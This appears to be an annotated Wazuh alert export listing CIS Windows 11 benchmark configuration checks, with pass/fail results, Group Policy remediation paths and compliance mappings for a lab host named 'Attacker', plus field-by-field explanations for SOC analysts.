rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off heap termination on corruption' is set to 'Disabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19008 Numeric ID of the detection rule that fired.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '2.2.4'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.31.3'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2587688 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26312 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Turn off heap termination on corruption' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: Without heap termination on corruption, legacy plug-in applications may continue to function when a File Explorer session has become corrupt. Ensuring that heap termination on corruption is active will prevent this. The recommended state for this setting is: Disabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Allowing an application to function after its session has become corrupt increases the risk posture to the system. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\File Explorer\Turn off heap termination on corruption. Note: This Group Policy path is provided by the Group Policy template Explorer.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates. Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.31.3 CIS benchmark recommendation number this check implements – look it up in the benchmark PDF for the full audit and remediation text.
data.sca.check.compliance.pci_dss: 2.2.4 PCI DSS requirement the check maps to – handy when an auditor asks for control evidence.
data.sca.check.compliance.nist_800_53: CM.1 NIST SP 800-53 control the check supports (CM = Configuration Management family).
data.sca.check.compliance.tsc: CC5.2 AICPA Trust Services Criteria mapping – the reference a SOC 2 auditor will use.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Explorer'] Registry key(s) the check inspected to decide pass/fail – verify the value here after the GPO applies.
data.sca.check.result: passed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off shell protocol protected mode' is set to 'Disabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19008 Numeric ID of the detection rule that fired.
rule.firedtimes: 7 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '2.2.4'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.31.4'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535010.2590885 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26313 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Turn off shell protocol protected mode' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to configure the amount of functionality that the shell protocol can have. When using the full functionality of this protocol, applications can open folders and launch files. The protected mode reduces the functionality of this protocol allowing applications to only open a limited set of folders. Applications are not able to open files with this protocol when it is in the protected mode. It is recommended to leave this protocol in the protected mode to increase the security of Windows. The recommended state for this setting is: Disabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Limiting the opening of files and folders to a limited set reduces the attack surface of the system. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\File Explorer\Turn off shell protocol protected mode. Note: This Group Policy path is provided by the Group Policy template WindowsExplorer.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates. Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.31.4 CIS benchmark recommendation number this check implements – look it up in the benchmark PDF for the full audit and remediation text.
data.sca.check.compliance.pci_dss: 2.2.4 PCI DSS requirement the check maps to – handy when an auditor asks for control evidence.
data.sca.check.compliance.nist_800_53: CM.1 NIST SP 800-53 control the check supports (CM = Configuration Management family).
data.sca.check.compliance.tsc: CC5.2 AICPA Trust Services Criteria mapping – the reference a SOC 2 auditor will use.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer'] Registry key(s) the check inspected to decide pass/fail – verify the value here after the GPO applies.
data.sca.check.result: passed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Prevent the computer from joining a homegroup' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 26 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '7.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.36.1'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535010.2594755 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26314 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Prevent the computer from joining a homegroup' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: By default, users can add their computer to a HomeGroup on a home network. The recommended state for this setting is: Enabled. Note: The HomeGroup feature is available in all workstation releases of Windows from Windows 7 through Windows 10 Release 1709. Microsoft removed the feature completely starting with Windows 10 Release 1803. However, if your environment still contains any Windows 10 Release 1709 (or older) workstations, then this setting remains important to disable HomeGroup on those systems. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: While resources on a domain-joined computer cannot be shared with a HomeGroup, information from the domain-joined computer can be leaked to other computers in the HomeGroup. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\HomeGroup\Prevent the computer from joining a homegroup. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Sharing.admx/adml that is included with the Microsoft Windows 7 & Server 2008 R2 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.36.1 CIS benchmark recommendation number this check implements – look it up in the benchmark PDF for the full audit and remediation text.
data.sca.check.compliance.pci_dss: 7.1 PCI DSS requirement the check maps to – handy when an auditor asks for control evidence.
data.sca.check.compliance.tsc: CC6.4 AICPA Trust Services Criteria mapping – the reference a SOC 2 auditor will use.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\HomeGroup'] Registry key(s) the check inspected to decide pass/fail – verify the value here after the GPO applies.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off location' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 27 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '2.2.5'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.41.1'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535010.2598554 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26315 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Turn off location' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting turns off the location feature for the computer. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: This setting affects the location feature (e.g. GPS or other location tracking). From a security perspective, it's not a good idea to reveal your location to software in most cases, but there are legitimate uses, such as mapping software. However, they should not be used in high security environments. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Location and Sensors\Turn off location. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Sensors.admx/adml that is included with the Microsoft Windows 7 & Server 2008 R2 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.41.1 CIS benchmark recommendation number this check implements – look it up in the benchmark PDF for the full audit and remediation text.
data.sca.check.compliance.pci_dss: 2.2.5 PCI DSS requirement the check maps to – handy when an auditor asks for control evidence.
data.sca.check.compliance.tsc: CC6.3 AICPA Trust Services Criteria mapping – the reference a SOC 2 auditor will use.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\LocationAndSensors'] Registry key(s) the check inspected to decide pass/fail – verify the value here after the GPO applies.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow Message Service Cloud Sync' is set to 'Disabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 28 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '4.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'SC.8'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535010.2601768 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26316 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Allow Message Service Cloud Sync' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows backup and restore of cellular text messages to Microsoft's cloud services. The recommended state for this setting is: Disabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: In a high security environment, data should never be sent to any 3rd party since this data could contain sensitive information. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Messaging\Allow Message Service Cloud Sync. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Messaging.admx/adml that is included with the Microsoft Windows 10 Release 1709 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.45.1 CIS benchmark recommendation number this check implements – look it up in the benchmark PDF for the full audit and remediation text.
data.sca.check.compliance.pci_dss: 4.1 PCI DSS requirement the check maps to – handy when an auditor asks for control evidence.
data.sca.check.compliance.hipaa: 164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II HIPAA Security Rule sections the check maps to (45 CFR 164.312 is the technical safeguards section).
data.sca.check.compliance.nist_800_53: SC.8 NIST SP 800-53 control the check supports (SC-8 = Transmission Confidentiality and Integrity).
data.sca.check.compliance.tsc: CC6.1,CC6.7,CC7.2 AICPA Trust Services Criteria mapping – the reference a SOC 2 auditor will use.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Messaging'] Registry key(s) the check inspected to decide pass/fail – verify the value here after the GPO applies.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Block all consumer Microsoft account user authentication' is set to 'Enabled'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Block all consumer Microsoft account user authentication' is set to 'Enabled'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Block all consumer Microsoft account user authentication' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 29 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '8.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.46.1'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['5.3'] Maps to the CIS Critical Security Controls (the numbered CIS Controls), distinct from the benchmark recommendation numbers in rule.cis.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535010.2604945 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26317 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Block all consumer Microsoft account user authentication' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This setting determines whether applications and services on the device can utilize new consumer Microsoft account authentication via the Windows OnlineID and WebAccountManager APIs. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Organizations that want to effectively implement identity management policies and maintain firm control of what accounts are used on their computers will probably want to block Microsoft accounts. Organizations may also need to block Microsoft accounts in order to meet the requirements of compliance standards that apply to their information systems. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft accounts\Block all consumer Microsoft account user authentication. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template MSAPolicy.admx/adml that is included with the Microsoft Windows 10 Release 1703 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.46.1 CIS benchmark recommendation number this check implements – look it up in the benchmark PDF for the full audit and remediation text.
data.sca.check.compliance.cis_csc: 5.3 CIS Critical Security Control the check supports, distinct from the benchmark recommendation number above.
data.sca.check.compliance.pci_dss: 8.1 PCI DSS requirement the check maps to – handy when an auditor asks for control evidence.
data.sca.check.compliance.tsc: CC6.1 AICPA Trust Services Criteria mapping – the reference a SOC 2 auditor will use.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\MicrosoftAccount'] Registry key(s) the check inspected to decide pass/fail – verify the value here after the GPO applies.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure local setting override for reporting to Microsoft MAPS' is set to 'Disabled'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure local setting override for reporting to Microsoft MAPS' is set to 'Disabled'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure local setting override for reporting to Microsoft MAPS' is set to 'Disabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19008 Numeric ID of the detection rule that fired.
rule.firedtimes: 8 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '2.2.5'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.47.4.1'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535010.2608665 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26318 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Configure local setting override for reporting to Microsoft MAPS' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting configures a local override for the configuration to join Microsoft Active Protection Service (MAPS), which Microsoft renamed to Windows Defender Antivirus Cloud Protection Service and then Microsoft Defender Antivirus Cloud Protection Service. This setting can only be set by Group Policy. The recommended state for this setting is: Disabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: The decision on whether or not to participate in Microsoft MAPS / Microsoft Defender Antivirus Cloud Protection Service for malicious software reporting should be made centrally in an enterprise managed environment, so that all computers within it behave consistently in that regard. Configuring this setting to Disabled ensures that the decision remains centrally managed. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\MAPS\Configure local setting override for reporting to Microsoft MAPS. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 8.1 & Server 2012 R2 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.47.4.1 CIS benchmark recommendation number this check implements – look it up in the benchmark PDF for the full audit and remediation text.
data.sca.check.compliance.pci_dss: 2.2.5 PCI DSS requirement the check maps to – handy when an auditor asks for control evidence.
data.sca.check.compliance.tsc: CC6.3 AICPA Trust Services Criteria mapping – the reference a SOC 2 auditor will use.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet'] Registry key(s) the check inspected to decide pass/fail – verify the value here after the GPO applies.
data.sca.check.result: passed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Join Microsoft MAPS' is set to 'Disabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19008 Numeric ID of the detection rule that fired.
rule.firedtimes: 9 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '2.2.5'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.47.4.2'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535010.2612831 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26319 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Join Microsoft MAPS' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to join Microsoft Active Protection Service (MAPS), which Microsoft renamed to Windows Defender Antivirus Cloud Protection Service and then Microsoft Defender Antivirus Cloud Protection Service. Microsoft MAPS / Microsoft Defender Antivirus Cloud Protection Service is the online community that helps you choose how to respond to potential threats. The community also helps stop the spread of new malicious software infections. You can choose to send basic or additional information about detected software. Additional information helps Microsoft create new definitions and help it to protect your computer. Possible options are: - (0x0) Disabled (default) - (0x1) Basic membership - (0x2) Advanced membership Basic membership will send basic information to Microsoft about software that has been detected including where the software came from the actions that you apply or that are applied automatically and whether the actions were successful. Advanced membership in addition to basic information will send more information to Microsoft about malicious software spyware and potentially unwanted software including the location of the software file names how the software operates and how it has impacted your computer. The recommended state for this setting is: Disabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: The information that would be sent can include things like location of detected items on your computer if harmful software was removed. The information would be automatically collected and sent. In some instances personal information might unintentionally be sent to Microsoft. However, Microsoft states that it will not use this information to identify you or contact you. For privacy reasons in high security environments, it is best to prevent these data submissions altogether. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\MAPS\Join Microsoft MAPS. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 8.1 & Server 2012 R2 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.47.4.2 CIS benchmark recommendation number this check implements – look it up in the benchmark PDF for the full audit and remediation text.
data.sca.check.compliance.pci_dss: 2.2.5 PCI DSS requirement the check maps to – handy when an auditor asks for control evidence.
data.sca.check.compliance.tsc: CC6.3 AICPA Trust Services Criteria mapping – the reference a SOC 2 auditor will use.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet'] Registry key(s) the check inspected to decide pass/fail – verify the value here after the GPO applies.
data.sca.check.result: passed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Attack Surface Reduction rules: Set the state for each ASR rule' is configured.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Attack Surface Reduction rules: Set the state for each ASR rule' is configured.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Attack Surface Reduction rules: Set the state for each ASR rule' is configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 30 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '2.2.4'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.47.5.1.2'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['10.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535010.2618728 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
